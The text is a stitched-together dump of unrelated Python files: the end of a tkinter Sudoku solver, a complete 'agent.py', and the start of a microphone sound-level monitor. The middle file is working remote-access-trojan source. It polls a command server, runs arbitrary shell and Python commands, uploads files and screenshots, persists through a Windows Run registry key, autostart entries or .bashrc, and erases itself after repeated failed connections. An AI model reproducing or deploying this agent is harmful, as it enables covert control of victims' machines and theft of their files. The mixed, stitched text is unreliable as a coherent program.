self.buttons_label_frame.grid(row=1, column=0, columnspan=2, pady=(0,10)) # Places label frame inside the right frame
self.start_btn.grid(row=1, column=0)
self.stop_btn.grid(row=1, column=1)
self.reset_btn.grid(row=1, column=2)
self.loading_bar.grid(row=1, column=3, sticky=tkinter.EW) # sticky parameter makes loading bar stretch from left to right
### WIDGET CONFIGURATION
self.scrollbar.config(command=self.solved_grids_display.yview) # Configures the scrolling of the text widget
self.solved_grids_display.tag_configure('header', font=('Helvetica', 10, 'bold'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the header font properties of the text widget
self.solved_grids_display.tag_configure('subheader', font=('Helvetica', 7, 'bold italic'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the subheader font properties of the text widget
self.solved_grids_display.tag_configure('solutions', font=('Helvetica', 14, 'bold'), foreground='#FC5F17', justify=tkinter.CENTER) # Configures the solution grids font properties of the text widget
### BINDING MOUSE AND KEYBOARD EVENTS
self.__draw_grid() # Draws the empty grid
self.canvas.bind('<Button-1>', self.__cell_clicked) # Binds left click to selecting a cell
        self.parent.bind('<Key>', self.__key_pressed) # Binds key presses to the handler; must be bound to root
def __draw_grid(self):
'Draws the Sudoku grid'
for i in range(10):
            if i % 3 == 0: # Every 3rd line (a 3x3 box boundary) is drawn in white
color = 'white'
else:
color = 'grey'
# Vertical lines
x0 = self.margin + (i*self.side)
y0 = self.margin
x1 = self.margin + (i*self.side)
y1 = self.height - self.margin
self.canvas.create_line(x0,y0,x1,y1, fill=color)
# Horizontal lines
x0 = self.margin
y0 = self.margin + (i*self.side)
x1 = self.height - self.margin
y1 = self.margin + (i*self.side)
self.canvas.create_line(x0,y0,x1,y1, fill=color)
### MOUSE AND KEYBOARD INPUT HANDLING
def __cell_clicked(self, event):
'''Handles mouse clicks
Takes event as argument. Creates indicator only if self.modify is True'''
x, y = event.x, event.y # Finds the x and y coordinate of the click
if self.modify: # Box selection functionality only available if modify variable is True
if (self.margin < x < self.width - self.margin) and (self.margin < y < self.height - self.margin): # Checks that the click is inside the grid
row, col = (y-self.margin)//self.side, (x-self.margin)//self.side # Calculates what row and column the cursor is in
if (row, col) == (self.row, self.col): # If cell is already selected, deselect it
self.row, self.col = None, None
else: # If it is not selected, select it
self.row, self.col = row, col
self.__draw_border() # Handles the box selection
else: # If the user clicks outside the canvas
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
def __draw_border(self):
'Draws the border around the selected square'
self.canvas.delete('cursor') # Deletes the previous cursor
if (self.row, self.col) != (None, None): # Checks that a box has not been deselected
x0 = self.margin + self.col*self.side # Defines the boundaries of the rectangle selection cursor
y0 = self.margin + self.row*self.side
x1 = self.margin + (self.col+1)*self.side
y1 = self.margin + (self.row+1)*self.side
self.canvas.create_rectangle(x0, y0, x1, y1, tags='cursor', outline='#03DAC6', width=2) # Creates the cursor
def __key_pressed(self, event):
'''Handles keyboard key press
Takes event as argument'''
if event.keysym == 'Return': # Return button used to start dynamic solving of the grid
if self.start_btn.cget('state') == 'normal': # Start button is enabled (program is ok to run)
self.__start() # Starts program execution
elif event.keysym == 'Escape': # Escape button used to stop the dynamic solving of the grid
if self.stop_btn.cget('state') == 'normal': # Stop button is enabled (program is ok to stop)
self.__stop() # Stops program execution
elif (self.row, self.col) != (None, None): # Checks that a square is selected
if event.char.isnumeric(): # If entered key is a digit
self.__display_number(self.row, self.col, event.char, color='#FC5F17') # Displays digit in canvas
self.reset_btn.config(state=tkinter.NORMAL) # Enables the reset button
if self.col == 8: # If selected cell is in the last column
if self.row != 8: # If the selected cell is not in the last row
self.row, self.col = self.row+1, 0 # Selects first cell of next row
else: # If selected cell is not in the last column
self.col += 1 # Selects next cell across
self.__draw_border()
elif event.keysym == 'BackSpace': # If backspace is pressed
self.__display_number(self.row, self.col, None) # Resets the square
### START/STOP/RESET METHODS
def __start(self):
'Begins the dynamic solving of the grid'
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
        self.grid = [ # Makes a new empty 9x9 grid which will store the user-entered values
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
]
# Stores each user-entered number in self.grid
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, _ in enumerate(row): # Goes through each position in the row
grid_object = self.canvas.find_withtag((ypos,xpos),) # Gets the grid number object with tag at respective position (row, column)
value = self.canvas.itemcget(grid_object, 'text') # Gets the value of the specific grid number; 'text' argument specifies we want to extract the text
# Note that value could be None
if value: # If the cell is filled in
self.grid[ypos][xpos] = int(value)
else: # If the cell is empty
self.grid[ypos][xpos] = 0
if not self.__validate_selected_grid(): # If the grid is not valid in format
return None # Returns early
else: # Grid is valid in format; GRID MAY NOT HAVE ANY SOLUTIONS
self.__update_grid(self.grid) # Displays the grid
threading.Thread(target=self.__solver_thread).start() # Initiates the solver thread
def __solver_thread(self):
'Main solver thread that solves self.grid'
self.running = True # Allows the solver thread to run
self.modify = False # Grid modification feature must be disabled when grid is solving
self.file_submenu.entryconfig(0, state=tkinter.DISABLED) # Disables the load functionality when program is running
self.file_submenu.entryconfig(2, state=tkinter.DISABLED) # Disables the save as functionality when program is running
self.option_submenu.entryconfig(0, state=tkinter.DISABLED) # Disables animations delay setting
self.start_btn.config(state=tkinter.DISABLED) # Disabled start button until execution is finished
self.stop_btn.config(state=tkinter.NORMAL) # Enables the stop button until execution is finished
self.reset_btn.config(state=tkinter.DISABLED) # Disables the reset button until execution is finished
self.status_bar.config(text='Executing solve.', fg='white') # Updates status bar
self.loading_bar.start() # Starts the loading bar animation
self.interrupted = self.__solve_grid() # Solves the grid and returns True (was interrupted) or False (was not interrupted); used for displaying or auto saving
self.running = False # Program is not running anymore
if self.solutions: # If at least 1 solution has been found
self.file_submenu.entryconfig(2, state=tkinter.NORMAL) # Re-enables the save as functionality
else: # If no solutions have been found
self.__update_solved_grids() # Updates the solved solutions text widget
self.option_submenu.entryconfig(0, state=tkinter.NORMAL) # Enables animations delay setting
self.stop_btn.config(state=tkinter.DISABLED) # Disables stop button at the end of execution
self.reset_btn.config(state=tkinter.NORMAL) # Enables the reset button
self.loading_bar.stop() # Stops the loading bar animation
if not self.interrupted: # Displays all solutions only if it was not interrupted
self.status_bar.config(text='Execution successful. Please reset grid.', fg='white') # Updates status bar
if self.autosave.get() and self.solutions: # If autosave is on and at least 1 solution has been found
self.__save() # Save the results
else: # If program was interrupted
self.status_bar.config(text='Execution interrupted. Please reset grid.', fg='white') # Updates status bar
def __stop(self):
'Interrupts the dynamic solving of the grid'
        self.running = False # Disallows the solver thread from running
def __reset(self):
'Resets the graphical user interface to its initial state'
self.file_submenu.entryconfig(0, state=tkinter.NORMAL) # Enables the load functionality when program is reset
self.file_submenu.entryconfig(2, state=tkinter.DISABLED) # Disables the save as functionality when program is reset
self.start_btn.config(state=tkinter.NORMAL) # Re-enables the start button
self.reset_btn.config(state=tkinter.DISABLED) # Disables the reset ability
self.solutions = [] # Resets all the found solutions
self.loaded_grid = None # Forgets the loaded grid
self.modify = True # Re-enables the modify flag to enable grid modification
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
self.solved_grids_display.config(state=tkinter.NORMAL) # Temporarily enables widget
self.solved_grids_display.delete(1.0, 'end') # Clears the entire solved solutions text widget
self.solved_grids_display.config(state=tkinter.DISABLED) # Disables widget again
self.__update_grid(self.empty_grid) # Displays the empty grid
self.status_bar.config(text='Reset complete.', fg='white') # Updates the status bar
### LOGIC HANDLING METHODS
def __solve_grid(self):
'''Solves the grid in self.grid and stores each solution as a list in self.solutions; displays each iteration of the solving algorithm
Returns True if process was interrupted or False if process was not interrupted'''
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position == 0: # Position must be empty
for num in range(1,10): # Tries all numbers from 1 to 9
if self.delay.get(): # If animation is set to be delayed
time.sleep(0.1)
if not self.running: # If it was interrupted
return True # Returns True; it was interrupted
                        if self.__possible(xpos, ypos, num): # Checks whether the number can be placed at this position
self.grid[ypos][xpos] = num # Puts possible number in empty space
self.__display_number(ypos, xpos, num)
self.__solve_grid() # Keeps solving
self.grid[ypos][xpos] = 0 # If program reaches here, no further numbers can be put into the grid and the square is reset
self.__display_number(ypos, xpos, None) # Empties the sudoku square
                    return False # No candidate fits this empty position; exits by returning False as it was not interrupted
# If program reaches this point, there are no more empty spaces in the grid and a solution has been found
deepcopy_grid = copy.deepcopy(self.grid) # A copy of the original grid is made
self.solutions.append(deepcopy_grid) # Solution added to list of solutions
self.__update_solved_grids() # Updates the solved solutions text widget
def __possible(self, x, y, n):
'''Returns True or False if a number can fit in a specific position in self.grid
Takes x position, y position, and value of a possible number as arguments'''
# Checks row
for position in self.grid[y]:
if position == n:
return False
# Checks column
for row in self.grid:
if row[x] == n:
return False
# Checks square
ranges = [range(0,3), range(3,6), range(6,9)] # Possible grid ranges
xrange = None # Stores the ranges that x and y are in
yrange = None
for possible_range in ranges:
if x in possible_range:
xrange = possible_range # If x fits in the range, the range is stored
if y in possible_range:
yrange = possible_range # If y fits in the range, the range is stored
for row in self.grid[yrange[0]:yrange[-1]+1]:
for position in row[xrange[0]:xrange[-1]+1]:
if position == n: # Checks every position in the square
return False
return True # No doubles detected
### VALIDATION METHODS
def __validate_selected_grid(self):
'Validates self.grid by making sure the value placement is correct and that at least 17 values have been entered; returns True or False if grid is valid'
count = 0 # Stores the valid grid clue count
for ypos, row in enumerate(self.grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position: # If the number is not 0
self.grid[ypos][xpos] = 0 # Sets the number to 0 temporarily so that self.__possible works
if not self.__possible(xpos, ypos, position): # If number cannot be placed in that position
# Note that number is not reset in the grid if it is invalid. Grid must be reset
self.status_bar.config(text=f'Conflict in clue positioning (Row:{ypos+1},Column:{xpos+1}). Invalid grid.', fg='#CF6679') # Updates status bar with dark red color
return False # Grid is invalid
self.grid[ypos][xpos] = position # Resets number in the grid after using __possible method
count += 1 # Number is valid
if count < 17: # If there are less than 17 clues
self.status_bar.config(text=f'Please enter at least 17 clues. ({17-count} remaining)', fg='#CF6679') # Updates status bar with dark red color
return False # Grid is invalid
return True # Grid is valid
def __validate_loaded_grid(self, grid): # Used for validating an imported grid
'''Validates the format of a LOADED grid by making sure only integer values between 0 to 9 are entered and that grid is of list type; returns True or False if grid format is valid
Takes grid as argument'''
        if not isinstance(grid, list): # Checks that the grid is a list
return False # Grid is not valid
for row in grid: # For each row in the grid
if len(row) != 9: # If exactly 9 items are not present in each row
return False # Grid is not valid
for position in row: # For each number in the grid
if position not in range(0, 10): # Number must be in range [0,10)
return False # Grid is invalid
return True # Grid is valid
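    # Example of the JSON layout that __load below expects: a list of nine rows, each a
    # list of nine integers where 0 marks an empty square, e.g. (hypothetical puzzle)
    # [[5,3,0,0,7,0,0,0,0],
    #  [6,0,0,1,9,5,0,0,0],
    #  ... seven more rows of nine values each ...]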
### DISPLAYER METHODS
def __update_grid(self, grid):
'''Displays a grid in the Sudoku canvas
Takes grid as argument'''
for ypos, row in enumerate(grid): # Goes through each row in the grid
for xpos, position in enumerate(row): # Goes through each position in the row
if position: # If the number does not equal to 0
self.__display_number(ypos, xpos, position, color='#FC5F17') # Displays the number
else: # If the number is 0, square is supposed to be empty
self.__display_number(ypos, xpos, None) # Empties square
def __update_solved_grids(self):
'Updates solved grids text widget by displaying all the found solutions from self.solutions'
self.solved_grids_display.config(state=tkinter.NORMAL) # Temporarily activates the text widget
self.solved_grids_display.delete(1.0, 'end') # Clears entire widget
self.solved_grids_display.insert('end', f'{len(self.solutions)} Solution(s) Found\n', 'header') # Adds header with header tag
if len(self.solutions) == 1: # If only 1 solution has been found
self.solved_grids_display.insert('end', f'(True Sudoku Grid)\n', 'subheader') # True Sudoku grid by definition
else: # If more than 1 solutions are found
self.solved_grids_display.insert('end', f'(False Sudoku Grid)\n', 'subheader') # False Sudoku grid by definition
for grid in self.solutions: # For each solution
self.solved_grids_display.insert('end', '\n') # Adds a separator between the solutions
for row in grid: # For each row in the solution grid
self.solved_grids_display.insert('end', f'{row}\n', 'solutions') # Appends the row to the text widget with solutions tag
self.solved_grids_display.see('end') # Automatically scrolls to the end of the widget
self.solved_grids_display.config(state=tkinter.DISABLED) # Deactivates the text widget
def __display_number(self, row, column, n, color='white'):
'''Displays a given digit on the Sudoku canvas
Takes the row number, column number, value of the number to display, and optional font color as arguments'''
x = round(self.margin + self.side*column + self.side/2) # Finds x and y coords of the centre of the selected square
y = round(self.margin + self.side*row + self.side/2) # Coordinates are rounded to nearest integer
tag = (row,column) # Create a tag from 00 to 88 representing the row and column the selected square is in
self.canvas.delete(tag) # Deletes previous
self.canvas.create_text(x, y, text=n, tags=(tag,), fill=color, font=self.gridfont) # Places a number on the screen with tagged position
# tags argument should be a tuple or string
def __solutions_formatter(self):
'''Manipulates the solutions in self.solutions into a printable format
Returns formatted string'''
formatted = f'-----------------------{len(self.solutions)} Solutions Found-----------------------\n' # String storing formatted solutions
if len(self.solutions) == 1: # If only 1 solution has been found
formatted += f'(True Sudoku Grid)' # True Sudoku grid by definition
else: # If more than 1 solutions are found
            formatted += f'(False Sudoku Grid)' # False Sudoku grid by definition
for grid in self.solutions: # For each solution
formatted += '\n' # Adds empty line between each solution
for row in grid: # For each row in the grid
formatted += f'\n{row}'
return formatted # Returns formatted solutions as a string
### MENUBAR SETTINGS METHODS
def __load(self):
'Loads a grid from a chosen json file'
try:
filename = filedialog.askopenfilename(title='Select Load File', filetypes=(('Text Files', '*.json'),)) # Prompts user to select a load file (.json)
if filename: # If a file has been chosen
with open(filename, 'r') as f: # Opens the chosen file as read
loaded_grid = json.load(f) # Deserialize json file contents
if self.__validate_loaded_grid(loaded_grid): # If the grid is of valid format
self.row, self.col = None, None # Resets the currently selected cell row and column
self.canvas.delete('cursor') # Deletes the previous cursor
self.reset_btn.config(state=tkinter.NORMAL) # Enabled reset button
self.__update_grid(loaded_grid) # Displays the grid
else: # If grid is invalid
raise Exception('Incorrect grid format') # Raises exception
else: # If program reaches this point, user has not chosen a file and has aborted load
return None
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
self.status_bar.config(text=f'An error occurred. Load aborted.', fg='#CF6689') # Updates status bar
else:
messagebox.showinfo(title='File loaded successfully', message=f"Grid has been successfully loaded from '{filename}'") # Shows successful load info
self.status_bar.config(text=f'Load successful.', fg='white') # Updates status bar
def __save(self):
'Saves all found solutions in chosen text file'
try:
            filename = filedialog.asksaveasfilename(title='Select Save File', filetypes=(('Text Files', '*.txt'),)) # Prompts user to select a save file (.txt)
if filename: # If a file has been chosen
with open(filename, 'w') as f: # Opens the chosen file
f.write(self.__solutions_formatter()) # Writes solutions into file
else: # If program reaches this point, user has not chosen a file and has aborted save
return None
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
self.status_bar.config(text=f'An error occurred. Save aborted.', fg='#CF6689') # Updates status bar
else:
messagebox.showinfo(title='File saved successfully', message=f"Solutions have been successfully saved in '{filename}'") # Shows successful save info
self.status_bar.config(text=f'Save successful.', fg='white') # Updates status bar
def __save_settings(self):
'Updates settings in settings.json'
try:
            with open(r'resources\settings.json', 'w') as f: # Opens the settings file for writing
self.settings = {'Autosave': self.autosave.get(), 'AnimationDelay': self.delay.get()} # Stores all the loadable settings as a dictionary
json.dump(self.settings, f) # Dumps the settings into json file
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
exit() # Exits program if an error occurs when saving
def __load_settings(self):
'Loads the settings from settings.json'
try:
            with open(r'resources\settings.json', 'r') as f: # Opens the settings file for reading
self.settings = json.load(f) # Loads all the settings
self.autosave.set(self.settings['Autosave'])
self.delay.set(self.settings['AnimationDelay'])
except Exception as e:
messagebox.showerror(title='Fatal Error', message=f'An unexpected error has occurred: {e}') # Shows error
exit() # Exits program if settings are not found
def __about(self):
'Opens README.md'
if os.path.isfile(r'README.md'): # If file has not been deleted
os.system(r'README.md') # Opens README.md with an adequate program like notepad
else: # If file has been deleted or cannot be found
messagebox.showerror(title='Fatal Error', message=f"File 'README.MD' not found.") # Shows error
def __licence(self):
'Opens the LICENCE.md'
if os.path.isfile(r'LICENCE.md'): # If file has not been deleted
            os.system(r'LICENCE.md') # Opens LICENCE.md with an adequate program like notepad
else: # If file has been deleted or cannot be found
messagebox.showerror(title='Fatal Error', message=f"File 'LICENCE.MD' not found.") # Shows error
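# Illustrative sketch (not part of the GraphicalInterface class above): the same
# row/column/box feasibility test that __possible performs, written as a standalone
# function over a plain 9x9 list of ints. The 3x3 box is located with integer
# arithmetic instead of a list of ranges. The function name and its parameters are
# hypothetical and exist only for this example.
def possible_standalone(grid, x, y, n):
    'Returns True if value n can be placed at column x, row y of a 9x9 grid'
    if n in grid[y]: # Row check
        return False
    if any(row[x] == n for row in grid): # Column check
        return False
    box_x, box_y = (x // 3) * 3, (y // 3) * 3 # Top-left corner of the 3x3 box
    for row in grid[box_y:box_y + 3]: # Box check
        if n in row[box_x:box_x + 3]:
            return False
    return True # No conflicts found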
root = tkinter.Tk() # Defines the main window
root.title('Sudoku Solver') # Sets the title of the window
root.iconbitmap(r'resources\sudoku_icon.ico') # Sets the icon for the window
root.resizable(False, False) # Disables resizing
root.config(bg='#212121')
GraphicalInterface(root) # GUI instance is created
root.mainloop()
|
agent.py
|
#!/usr/bin/env python2
# coding: utf-8
import requests
import time
import os
import subprocess
import platform
import shutil
import sys
import traceback
import threading
import uuid
import StringIO
import zipfile
import tempfile
import socket
import getpass
if os.name == 'nt':
from PIL import ImageGrab
else:
import pyscreenshot as ImageGrab
import config
def threaded(func):
def wrapper(*_args, **kwargs):
        t = threading.Thread(target=func, args=_args, kwargs=kwargs)
t.start()
return
return wrapper
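# Note: methods decorated with @threaded below (runcmd, python, upload, download, zip,
# screenshot) return immediately and do their work on a background thread; the Thread
# handle itself is discarded, so callers cannot join or inspect it.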
class Agent(object):
def __init__(self):
self.idle = True
self.silent = False
self.platform = platform.system() + " " + platform.release()
self.last_active = time.time()
self.failed_connections = 0
self.uid = self.get_UID()
self.hostname = socket.gethostname()
self.username = getpass.getuser()
def get_install_dir(self):
install_dir = None
if platform.system() == 'Linux':
install_dir = self.expand_path('~/.ares')
elif platform.system() == 'Windows':
install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if os.path.exists(install_dir):
return install_dir
else:
return None
def is_installed(self):
return self.get_install_dir()
def get_consecutive_failed_connections(self):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
if os.path.exists(check_file):
with open(check_file, "r") as f:
return int(f.read())
else:
return 0
else:
return self.failed_connections
def update_consecutive_failed_connections(self, value):
if self.is_installed():
install_dir = self.get_install_dir()
check_file = os.path.join(install_dir, "failed_connections")
with open(check_file, "w") as f:
f.write(str(value))
else:
self.failed_connections = value
def log(self, to_log):
""" Write data to agent log """
print(to_log)
def get_UID(self):
""" Returns a unique ID for the agent """
return getpass.getuser() + "_" + str(uuid.getnode())
def server_hello(self):
""" Ask server for instructions """
req = requests.post(config.SERVER + '/api/' + self.uid + '/hello',
json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username})
return req.text
def send_output(self, output, newlines=True):
""" Send console output to server """
if self.silent:
self.log(output)
return
if not output:
return
if newlines:
output += "\n\n"
req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
data={'output': output})
def expand_path(self, path):
""" Expand environment variables and metacharacters in a path """
return os.path.expandvars(os.path.expanduser(path))
@threaded
def runcmd(self, cmd):
""" Runs a shell command and returns its output """
try:
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
output = (out + err)
self.send_output(output)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def python(self, command_or_file):
""" Runs a python command or a python file and returns the output """
new_stdout = StringIO.StringIO()
old_stdout = sys.stdout
sys.stdout = new_stdout
new_stderr = StringIO.StringIO()
old_stderr = sys.stderr
sys.stderr = new_stderr
if os.path.exists(command_or_file):
self.send_output("[*] Running python file...")
with open(command_or_file, 'r') as f:
python_code = f.read()
try:
exec(python_code)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
self.send_output("[*] Running python command...")
try:
exec(command_or_file)
except Exception as exc:
self.send_output(traceback.format_exc())
sys.stdout = old_stdout
sys.stderr = old_stderr
self.send_output(new_stdout.getvalue() + new_stderr.getvalue())
def cd(self, directory):
""" Change current directory """
os.chdir(self.expand_path(directory))
@threaded
def upload(self, file):
""" Uploads a local file to the server """
file = self.expand_path(file)
try:
if os.path.exists(file) and os.path.isfile(file):
self.send_output("[*] Uploading %s..." % file)
requests.post(config.SERVER + '/api/' + self.uid + '/upload',
files={'uploaded': open(file, 'rb')})
else:
self.send_output('[!] No such file: ' + file)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def download(self, file, destination=''):
""" Downloads a file the the agent host through HTTP(S) """
try:
destination = self.expand_path(destination)
if not destination:
                destination = file.split('/')[-1]
self.send_output("[*] Downloading %s..." % file)
req = requests.get(file, stream=True)
with open(destination, 'wb') as f:
for chunk in req.iter_content(chunk_size=8000):
if chunk:
f.write(chunk)
self.send_output("[+] File downloaded: " + destination)
except Exception as exc:
self.send_output(traceback.format_exc())
def persist(self):
""" Installs the agent """
if not getattr(sys, 'frozen', False):
self.send_output('[!] Persistence only supported on compiled agents.')
return
if self.is_installed():
self.send_output('[!] Agent seems to be already installed.')
return
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
os.system('chmod +x ' + agent_path)
if os.path.exists(self.expand_path("~/.config/autostart/")):
desktop_entry = "[Desktop Entry]\nVersion=1.0\nType=Application\nName=Ares\nExec=%s\n" % agent_path
with open(self.expand_path('~/.config/autostart/ares.desktop'), 'w') as f:
f.write(desktop_entry)
else:
with open(self.expand_path("~/.bashrc"), "a") as f:
f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
if not os.path.exists(persist_dir):
os.makedirs(persist_dir)
agent_path = os.path.join(persist_dir, os.path.basename(sys.executable))
shutil.copyfile(sys.executable, agent_path)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent installed.')
def clean(self):
""" Uninstalls the agent """
if platform.system() == 'Linux':
persist_dir = self.expand_path('~/.ares')
if os.path.exists(persist_dir):
shutil.rmtree(persist_dir)
desktop_entry = self.expand_path('~/.config/autostart/ares.desktop')
if os.path.exists(desktop_entry):
os.remove(desktop_entry)
os.system("grep -v .ares .bashrc > .bashrc.tmp;mv .bashrc.tmp .bashrc")
elif platform.system() == 'Windows':
persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares"
subprocess.Popen(cmd, shell=True)
cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir)
subprocess.Popen(cmd, shell=True)
self.send_output('[+] Agent removed successfully.')
def exit(self):
""" Kills the agent """
self.send_output('[+] Exiting... (bye!)')
sys.exit(0)
@threaded
def zip(self, zip_name, to_zip):
""" Zips a folder or file """
try:
zip_name = self.expand_path(zip_name)
to_zip = self.expand_path(to_zip)
if not os.path.exists(to_zip):
self.send_output("[+] No such file or directory: %s" % to_zip)
return
self.send_output("[*] Creating zip archive...")
zip_file = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
if os.path.isdir(to_zip):
relative_path = os.path.dirname(to_zip)
for root, dirs, files in os.walk(to_zip):
for file in files:
zip_file.write(os.path.join(root, file), os.path.join(root, file).replace(relative_path, '', 1))
else:
zip_file.write(to_zip, os.path.basename(to_zip))
zip_file.close()
self.send_output("[+] Archive created: %s" % zip_name)
except Exception as exc:
self.send_output(traceback.format_exc())
@threaded
def screenshot(self):
""" Takes a screenshot and uploads it to the server"""
screenshot = ImageGrab.grab()
tmp_file = tempfile.NamedTemporaryFile()
screenshot_file = tmp_file.name + ".png"
tmp_file.close()
screenshot.save(screenshot_file)
self.upload(screenshot_file)
def help(self):
""" Displays the help """
self.send_output(config.HELP)
def run(self):
""" Main loop """
self.silent = True
if config.PERSIST:
try:
self.persist()
except:
self.log("Failed executing persistence")
self.silent = False
while True:
try:
todo = self.server_hello()
self.update_consecutive_failed_connections(0)
# Something to do ?
if todo:
commandline = todo
self.idle = False
self.last_active = time.time()
self.send_output('$ ' + commandline)
split_cmd = commandline.split(" ")
command = split_cmd[0]
args = []
if len(split_cmd) > 1:
args = split_cmd[1:]
try:
if command == 'cd':
if not args:
self.send_output('usage: cd </path/to/directory>')
else:
self.cd(args[0])
elif command == 'upload':
if not args:
self.send_output('usage: upload <localfile>')
else:
self.upload(args[0],)
elif command == 'download':
if not args:
self.send_output('usage: download <remote_url> <destination>')
else:
if len(args) == 2:
self.download(args[0], args[1])
else:
self.download(args[0])
elif command == 'clean':
self.clean()
elif command == 'persist':
self.persist()
elif command == 'exit':
self.exit()
elif command == 'zip':
if not args or len(args) < 2:
self.send_output('usage: zip <archive_name> <folder>')
else:
self.zip(args[0], " ".join(args[1:]))
elif command == 'python':
if not args:
self.send_output('usage: python <python_file> or python <python_command>')
else:
self.python(" ".join(args))
elif command == 'screenshot':
self.screenshot()
elif command == 'help':
self.help()
else:
self.runcmd(commandline)
except Exception as exc:
self.send_output(traceback.format_exc())
else:
if self.idle:
time.sleep(config.HELLO_INTERVAL)
elif (time.time() - self.last_active) > config.IDLE_TIME:
self.log("Switching to idle mode...")
self.idle = True
else:
time.sleep(0.5)
except Exception as exc:
self.log(traceback.format_exc())
failed_connections = self.get_consecutive_failed_connections()
failed_connections += 1
self.update_consecutive_failed_connections(failed_connections)
self.log("Consecutive failed connections: %d" % failed_connections)
if failed_connections > config.MAX_FAILED_CONNECTIONS:
self.silent = True
self.clean()
self.exit()
time.sleep(config.HELLO_INTERVAL)
def main():
agent = Agent()
agent.run()
if __name__ == "__main__":
main()
|
soundmonitor.py
|
# Python 3.8.2
# Started on 2020-05-14 by Dylan Halladay
""" Program to monitor audio input levels
and react to noises in realtime.
PLEASE READ
This program prioritizes reaction time over
efficient RAM/CPU usage. As such, several
single-task child processes will be spawned
upon execution, each with only one job.
This allows for realtime response to noises
based on their loudness.
SETTINGS
To change mono/stereo, sampling rate, and
record time, change the constants in the
settings section of the file.
The program only accepts 16-bit audio. """
import sys
import pyaudio # I had to use "python -m pipwin install pyaudio" on Windows (version 0.2.11)
import audioop
import queue # Just for exceptions from mp.Queue()
import datetime
import time
import numpy as np # pip install numpy
import multiprocessing as mp
from decimal import Decimal, InvalidOperation
# ========================
# Settings
# ========================
# Mono or stereo mic?
CHANNELS = 1
# Sampling rate of mic in Hz?
RATE = 48000
# RMS quantize level (output precision)
RMS_rounder = Decimal('1')
# dB quantize level (output precision)
dB_rounder = Decimal('01.23')
# Output prefix enabled? True/False
# Content of prefix is determined in prefix() function
enable_prefixes = True
# Desired record time per output in seconds?
# Higher = Less output/sec, may be more accurate, may miss very fast sounds
# Lower = More output/sec, may be less accurate, catches very fast sounds
# (Time required to process sound may make time between outputs vary slightly)
record_time = 0.1
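# With the defaults above (CHANNELS = 1, RATE = 48000, record_time = 0.1) each read
# pulls 48000 * 0.1 = 4800 frames, giving roughly ten RMS/dB readings per second.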
# ========================
# End of settings
# ========================
class Sound(object):
""" Used to give detected sounds a dB value and loudness rating.
Raw attributes are type Decimal, others are type string.
Non-raw attributes are truncated according to settings. """
def __init__(self):
self.visual_string = "Not set" # string
self.raw_RMS = "Not set" # Decimal
self.raw_dB = "Not set" # Decimal
self.RMS = "Not set" # string
self.dB = "Not set" # string
# ========================
# Basic functions
# ========================
def queue_put(queue_name, given):
""" I put the try/except in a function to avoid
typing it several times. """
try:
queue_name.put(given)
except queue.Empty:
print("queue_put: Queue empty!")
except queue.Full:
print("queue_put: Queue full!")
def queue_get(queue_name):
""" I put the try/except in a function to avoid
typing it several times. """
try:
x = queue_name.get()
except queue.Empty:
print("queue_get: Queue empty!")
return None
except queue.Full:
print("queue_get: Queue full!")
return None
return x
def prefix():
""" Only retuns string if prefixes are enabled in settings """
if enable_prefixes:
# Return timestamp in "2020-05-15 HH:MM:SS.xx" format
date_now = datetime.datetime.today().strftime('%Y-%m-%d') # YYYY-MM-DD
time_now = datetime.datetime.today().strftime('%H:%M:%S.%f')[:-4] # HH:MM:SS.xxxxxx --> HH:MM:SS.xx
return date_now + " " + time_now + " - "
else:
return ""
# Audio Monitor Process --> Measure Sound Process --> Rate Sound Process --> Sound Handler Process
# ========================
# Audio Monitor Process
# ========================
